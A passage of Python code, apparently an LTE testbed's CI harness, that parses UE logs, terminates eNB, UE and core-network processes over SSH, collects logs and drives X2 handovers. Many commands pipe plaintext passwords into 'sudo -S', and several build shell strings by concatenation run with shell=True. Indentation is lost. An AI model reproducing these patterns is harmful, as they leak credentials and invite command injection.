mibMsg = "Measured Carrier Frequency = " + result.group('measured_carrier_frequency') + ' Hz'
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
frequency_found = True
except Exception as e:
logging.error('\033[91m' + "Measured Carrier Frequency not found" + '\033[0m')
result = re.search("PLMN MCC (?P<mcc>\d{1,3}), MNC (?P<mnc>\d{1,3}), TAC", str(line))
if result is not None and (not plmn_found):
try:
mibMsg = 'PLMN MCC = ' + result.group('mcc') + ' MNC = ' + result.group('mnc')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
plmn_found = True
except Exception as e:
logging.error('\033[91m' + "PLMN not found" + '\033[0m')
result = re.search("Found (?P<operator>[\w,\s]{1,15}) \(name from internal table\)", str(line))
if result is not None:
try:
mibMsg = "The operator is: " + result.group('operator')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "Operator name not found" + '\033[0m')
result = re.search("SIB5 InterFreqCarrierFreq element (.{1,4})/(.{1,4})", str(line))
if result is not None:
try:
mibMsg = "SIB5 InterFreqCarrierFreq element " + result.group(1) + '/' + result.group(2)
self.htmlUEFailureMsg += mibMsg + ' -> '
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "SIB5 InterFreqCarrierFreq element not found" + '\033[0m')
result = re.search("DL Carrier Frequency/ARFCN : (?P<carrier_frequency>\d{1,15}/\d{1,4})", str(line))
if result is not None:
try:
freq = result.group('carrier_frequency')
new_freq = re.sub('/[0-9]+','',freq)
float_freq = float(new_freq) / 1000000
self.htmlUEFailureMsg += 'DL Freq: ' + ('%.1f' % float_freq) + ' MHz'
logging.debug('\033[94m' + " DL Carrier Frequency is: " + freq + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " DL Carrier Frequency not found" + '\033[0m')
result = re.search("AllowedMeasBandwidth : (?P<allowed_bandwidth>\d{1,7})", str(line))
if result is not None:
try:
prb = result.group('allowed_bandwidth')
self.htmlUEFailureMsg += ' -- PRB: ' + prb + '\n'
logging.debug('\033[94m' + " AllowedMeasBandwidth: " + prb + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " AllowedMeasBandwidth not found" + '\033[0m')
ue_log_file.close()
if rrcConnectionRecfgComplete > 0:
statMsg = 'UE connected to eNB (' + str(rrcConnectionRecfgComplete) + ' RRCConnectionReconfigurationComplete message(s) generated)'
logging.debug('\033[94m' + statMsg + '\033[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if uciStatMsgCount > 0:
statMsg = 'UE showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if pdcpDataReqFailedCount > 0:
statMsg = 'UE showed ' + str(pdcpDataReqFailedCount) + ' "PDCP data request failed" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if badDciCount > 0:
statMsg = 'UE showed ' + str(badDciCount) + ' "bad DCI 1A" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if self.eNBmbmsEnables[0]:
if mbms_messages > 0:
statMsg = 'UE showed ' + str(mbms_messages) + ' "TRIED TO PUSH MBMS DATA" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
else:
statMsg = 'UE did NOT SHOW "TRIED TO PUSH MBMS DATA" message(s)'
logging.debug('\u001B[1;30;41m ' + statMsg + ' \u001B[0m')
self.htmlUEFailureMsg += statMsg + '\n'
if foundSegFault:
logging.debug('\u001B[1;37;41m UE ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;30;43m UE showed an assertion! \u001B[0m')
self.htmlUEFailureMsg += 'UE showed an assertion!\n'
if not mib_found or not frequency_found:
return OAI_UE_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m UE faced real time issues! \u001B[0m')
self.htmlUEFailureMsg += 'UE faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if no_cell_sync_found and not mib_found:
logging.debug('\u001B[1;37;41m UE could not synchronize ! \u001B[0m')
self.htmlUEFailureMsg += 'UE could not synchronize!\n'
return OAI_UE_PROCESS_COULD_NOT_SYNC
return 0
def TerminateeNB(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath + '/cmake_targets', '\$', 5)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S daemon --name=enb' + str(self.eNB_instance) + '_daemon --stop', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S killall --signal SIGINT lte-softmodem || true', '\$', 5)
time.sleep(10)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S killall --signal SIGKILL lte-softmodem || true', '\$', 5)
time.sleep(5)
self.command('rm -f my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.close()
# If tracer options is on, stopping tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
time.sleep(1)
if self.EPC_PcapFileName != '':
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + self.EPC_PcapFileName, '.')
self.copyout(lIpAddr, lUserName, lPassWord, self.EPC_PcapFileName, lSourcePath + '/cmake_targets/.')
self.close()
logging.debug('\u001B[1m Replaying RAW record file\u001B[0m')
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath + '/common/utils/T/tracer/', '\$', 5)
enbLogFile = self.eNBLogFiles[int(self.eNB_instance)]
raw_record_file = enbLogFile.replace('.log', '_record.raw')
replay_log_file = enbLogFile.replace('.log', '_replay.log')
extracted_txt_file = enbLogFile.replace('.log', '_extracted_messages.txt')
extracted_log_file = enbLogFile.replace('.log', '_extracted_messages.log')
self.command('./extract_config -i ' + lSourcePath + '/cmake_targets/' + raw_record_file + ' > ' + lSourcePath + '/cmake_targets/' + extracted_txt_file, '\$', 5)
self.command('echo $USER; nohup ./replay -i ' + lSourcePath + '/cmake_targets/' + raw_record_file + ' > ' + lSourcePath + '/cmake_targets/' + replay_log_file + ' 2>&1 &', lUserName, 5)
self.command('./textlog -d ' + lSourcePath + '/cmake_targets/' + extracted_txt_file + ' -no-gui -ON -full > ' + lSourcePath + '/cmake_targets/' + extracted_log_file, '\$', 5)
self.close()
self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/' + extracted_log_file, '.')
logging.debug('\u001B[1m Analyzing eNB replay logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_eNB(extracted_log_file)
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBLogFiles[int(self.eNB_instance)] = ''
else:
analyzeFile = False
if self.eNBLogFiles[int(self.eNB_instance)] != '':
analyzeFile = True
fileToAnalyze = self.eNBLogFiles[int(self.eNB_instance)]
self.eNBLogFiles[int(self.eNB_instance)] = ''
if analyzeFile:
copyin_res = self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/' + fileToAnalyze, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy eNB logfile to analyze it! \u001B[0m')
self.htmleNBFailureMsg = 'Could not copy eNB logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', ENB_PROCESS_NOLOGFILE_TO_ANALYZE)
self.eNBmbmsEnables[int(self.eNB_instance)] = False
return
if self.eNB_serverId != '0':
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, './' + fileToAnalyze, self.eNBSourceCodePath + '/cmake_targets/')
logging.debug('\u001B[1m Analyzing eNB logfile \u001B[0m ' + fileToAnalyze)
logStatus = self.AnalyzeLogFile_eNB(fileToAnalyze)
if (logStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', logStatus)
self.preamtureExit = True
self.eNBmbmsEnables[int(self.eNB_instance)] = False
return
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBmbmsEnables[int(self.eNB_instance)] = False
def TerminateHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT oai_hss || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep hss | grep -v grep', '\$', 5)
result = re.search('oai_hss -j', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL oai_hss || true', '\$', 5)
self.command('rm -f ' + self.EPCSourceCodePath + '/scripts/my-hss.sh', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_hss oai_hss || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep hss | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_hss oai_hss || true', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=simulated_hss --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL hss_sim', '\$', 5)
else:
logging.error('This should not happen!')
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE) or re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_mme mme || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep mme | grep -v grep', '\$', 5)
result = re.search('mme -c', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_mme mme || true', '\$', 5)
self.command('rm -f ' + self.EPCSourceCodePath + '/scripts/my-mme.sh', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_mme', '\$', 5)
else:
logging.error('This should not happen!')
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT spgwc spgwu || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep spgw | grep -v grep', '\$', 5)
result = re.search('spgwc -c |spgwu -c ', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL spgwc spgwu || true', '\$', 5)
self.command('rm -f ' + self.EPCSourceCodePath + '/scripts/my-spgw*.sh', '\$', 5)
self.command('stdbuf -o0 ps -aux | grep tshark | grep -v grep', '\$', 5)
result = re.search('-w ', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT tshark || true', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 ' + self.EPCSourceCodePath + '/scripts/*.pcap', '\$', 5)
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_spgw spgw || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep spgw | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_spgw spgw || true', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_xGw', '\$', 5)
else:
logging.error('This should not happen!')
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateFlexranCtrl(self):
if self.flexranCtrlInstalled == False or self.flexranCtrlStarted == False:
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=flexran_rtc_daemon --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL rt_controller', '\$', 5)
time.sleep(1)
self.close()
self.flexranCtrlStarted = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# back in airplane mode on (ie radio off)
if self.ADBCentralized:
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "ps | grep --color=never iperf | grep -v grep"', '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ps | grep --color=never iperf | grep -v grep"\'', '\$', 60)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"', '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"\'', '\$', 60)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def TerminateUE(self):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target= SSH.TerminateUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateOAIUE(self):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
self.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S daemon --name=ue' + str(self.UE_instance) + '_daemon --stop', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGINT lte-uesoftmodem || true', '\$', 5)
time.sleep(10)
self.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGKILL lte-uesoftmodem || true', '\$', 5)
time.sleep(5)
self.command('rm -f my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.close()
result = re.search('ue_', str(self.UELogFile))
if result is not None:
copyin_res = self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy UE logfile to analyze it! \u001B[0m')
self.htmlUEFailureMsg = 'Could not copy UE logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE, 'UE')
self.UELogFile = ''
return
logging.debug('\u001B[1m Analyzing UE logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is not None:
ueAction = 'Sniffing'
else:
ueAction = 'Connection'
if (logStatus < 0):
logging.debug('\u001B[1m' + ueAction + ' Failed \u001B[0m')
self.htmlUEFailureMsg = '<b>' + ueAction + ' Failed</b>\n' + self.htmlUEFailureMsg
self.CreateHtmlTestRow('N/A', 'KO', logStatus, 'UE')
# In case of sniffing on commercial eNBs we have random results
# Not an error then
if (logStatus != OAI_UE_PROCESS_COULD_NOT_SYNC) or (ueAction != 'Sniffing'):
self.Initialize_OAI_UE_args = ''
self.AutoTerminateUEandeNB()
else:
logging.debug('\u001B[1m' + ueAction + ' Completed \u001B[0m')
self.htmlUEFailureMsg = '<b>' + ueAction + ' Completed</b>\n' + self.htmlUEFailureMsg
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.UELogFile = ''
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def AutoTerminateUEandeNB(self):
if (self.ADBIPAddress != 'none'):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateUE()
if (self.Initialize_OAI_UE_args != ''):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateOAIUE()
if (self.Initialize_eNB_args != ''):
self.testCase_id = 'AUTO-KILL-eNB'
self.desc = 'Automatic Termination of eNB'
self.ShowTestID()
self.eNB_instance = '0'
self.TerminateeNB()
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.testCase_id = 'AUTO-KILL-flexran-ctl'
self.desc = 'Automatic Termination of FlexRan CTL'
self.ShowTestID()
self.TerminateFlexranCtrl()
self.prematureExit = True
def IdleSleep(self):
time.sleep(self.idle_sleep_time)
self.CreateHtmlTestRow(str(self.idle_sleep_time) + ' sec', 'OK', ALL_PROCESSES_OK)
def X2_Status(self, idx, fileName):
cmd = "curl --silent http://" + self.EPCIPAddress + ":9999/stats | jq '.' > " + fileName
message = cmd + '\n'
logging.debug(cmd)
subprocess.run(cmd, shell=True)
if idx == 0:
cmd = "jq '.mac_stats | length' " + fileName
strNbEnbs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2NbENBs = int(strNbEnbs.strip())
cnt = 0
while cnt < self.x2NbENBs:
cmd = "jq '.mac_stats[" + str(cnt) + "].bs_id' " + fileName
bs_id = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBBsIds[idx].append(bs_id.strip())
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats | length' " + fileName
stNbUEs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
nbUEs = int(stNbUEs.strip())
ueIdx = 0
self.x2ENBConnectedUEs[idx].append([])
while ueIdx < nbUEs:
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats[" + str(ueIdx) + "].rnti' " + fileName
rnti = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBConnectedUEs[idx][cnt].append(rnti.strip())
ueIdx += 1
cnt += 1
msg = "FlexRan Controller is connected to " + str(self.x2NbENBs) + " eNB(s)"
logging.debug(msg)
message += msg + '\n'
cnt = 0
while cnt < self.x2NbENBs:
msg = " -- eNB: " + str(self.x2ENBBsIds[idx][cnt]) + " is connected to " + str(len(self.x2ENBConnectedUEs[idx][cnt])) + " UE(s)"
logging.debug(msg)
message += msg + '\n'
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[idx][cnt]):
msg = " -- UE rnti: " + str(self.x2ENBConnectedUEs[idx][cnt][ueIdx])
logging.debug(msg)
message += msg + '\n'
ueIdx += 1
cnt += 1
return message
def Perform_X2_Handover(self):
html_queue = SimpleQueue()
fullMessage = '<pre style="background-color:white">'
msg = 'Doing X2 Handover w/ option ' + self.x2_ho_options
logging.debug(msg)
fullMessage += msg + '\n'
if self.x2_ho_options == 'network':
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.x2ENBBsIds.append([])
self.x2ENBBsIds.append([])
self.x2ENBConnectedUEs.append([])
self.x2ENBConnectedUEs.append([])
fullMessage += self.X2_Status(0, self.testCase_id + '_pre_ho.json')
msg = "Activating the X2 Net control on each eNB"
logging.debug(msg)
fullMessage += msg + '\n'
eNB_cnt = self.x2NbENBs
cnt = 0
while cnt < eNB_cnt:
cmd = "curl --silent -XPOST http://" + self.EPCIPAddress + ":9999/rrc/x2_ho_net_control/enb/" + str(self.x2ENBBsIds[0][cnt]) + "/1"
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
cnt += 1
# Waiting for the activation to be active
time.sleep(20)
msg = "Switching UE(s) from eNB to eNB"
logging.debug(msg)
fullMessage += msg + '\n'
cnt = 0
while cnt < eNB_cnt:
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[0][cnt]):
cmd = "curl --silent -XPOST http://" + self.EPCIPAddress + ":9999/rrc/ho/senb/" + str(self.x2ENBBsIds[0][cnt]) + "/ue/" + str(self.x2ENBConnectedUEs[0][cnt][ueIdx]) + "/tenb/" + str(self.x2ENBBsIds[0][eNB_cnt - cnt - 1])
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
ueIdx += 1
cnt += 1
time.sleep(20)
# check
logging.debug("Checking the Status after X2 Handover")
fullMessage += self.X2_Status(1, self.testCase_id + '_post_ho.json')
cnt = 0
x2Status = True
while cnt < eNB_cnt:
if len(self.x2ENBConnectedUEs[0][cnt]) == len(self.x2ENBConnectedUEs[1][cnt]):
x2Status = False
cnt += 1
if x2Status:
msg = "X2 Handover was successful"
logging.debug(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
msg = "X2 Handover FAILED"
logging.error(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRow('Cannot perform requested X2 Handover', 'KO', ALL_PROCESSES_OK)
def LogCollectBuild(self):
if (self.eNBIPAddress != '' and self.eNBUserName != '' and self.eNBPassword != ''):
IPAddress = self.eNBIPAddress
UserName = self.eNBUserName
Password = self.eNBPassword
SourceCodePath = self.eNBSourceCodePath
elif (self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != ''):
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
SourceCodePath = self.UESourceCodePath
else:
sys.exit('Insufficient Parameter')
self.open(IPAddress, UserName, Password)
self.command('cd ' + SourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('rm -f build.log.zip', '\$', 5)
self.command('zip build.log.zip build_log_*/*', '\$', 60)
self.close()
def LogCollecteNB(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -f enb.log.zip', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S zip enb.log.zip enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 60)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 5)
self.close()
def LogCollectPing(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f ping.log.zip', '\$', 5)
self.command('zip ping.log.zip ping*.log', '\$', 60)
self.command('rm ping*.log', '\$', 5)
self.close()
def LogCollectIperf(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f iperf.log.zip', '\$', 5)
self.command('zip iperf.log.zip iperf*.log', '\$', 60)
self.command('rm iperf*.log', '\$', 5)
self.close()
def LogCollectHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f hss.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE) or re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('zip hss.log.zip hss*.log', '\$', 60)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm hss*.log', '\$', 5)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('zip hss.log.zip logs/hss*.* *.pcap', '\$', 60)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f logs/hss*.* *.pcap', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cp /opt/hss_sim0609/hss.log .', '\$', 60)
self.command('zip hss.log.zip hss.log', '\$', 60)
else:
logging.error('This option should not occur!')
self.close()
def LogCollectMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f mme.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE) or re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('zip mme.log.zip mme*.log', '\$', 60)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm mme*.log', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cp /opt/ltebox/var/log/*Log.0 .', '\$', 5)
self.command('zip mme.log.zip mmeLog.0 s1apcLog.0 s1apsLog.0 s11cLog.0 libLog.0 s1apCodecLog.0', '\$', 60)
else:
logging.error('This option should not occur!')
self.close()
def LogCollectSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath + '/scripts', '\$', 5)
self.command('rm -f spgw.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE) or re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('zip spgw.log.zip spgw*.log', '\$', 60)
self.command('echo ' + self.EPCPassword + ' | sudo -S rm spgw*.log', '\$', 5)
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('cp /opt/ltebox/var/log/xGwLog.0 .', '\$', 5)
self.command('zip spgw.log.zip xGwLog.0', '\$', 60)
else:
logging.error('This option should not occur!')
self.close()
def LogCollectOAIUE(self):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -f ue.log.zip', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S zip ue.log.zip ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 60)
self.command('echo ' + self.UEPassword + ' | sudo -S rm ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 5)
self.close()
def RetrieveSystemVersion(self, machine):
if self.eNBIPAddress == 'none' or self.UEIPAddress == 'none':
self.OsVersion = 'Ubuntu 16.04.5 LTS'
self.KernelVersion = '4.15.0-45-generic'
self.UhdVersion = '3.13.0.1-0'
self.UsrpBoard = 'B210'
self.CpuNb = '4'
self.CpuModel = 'Intel(R) Core(TM) i5-6200U'
self.CpuMHz = '2399.996 MHz'
return 0
if machine == 'eNB':
if self.eNBIPAddress != '' and self.eNBUserName != '' and self.eNBPassword != '':
IPAddress = self.eNBIPAddress
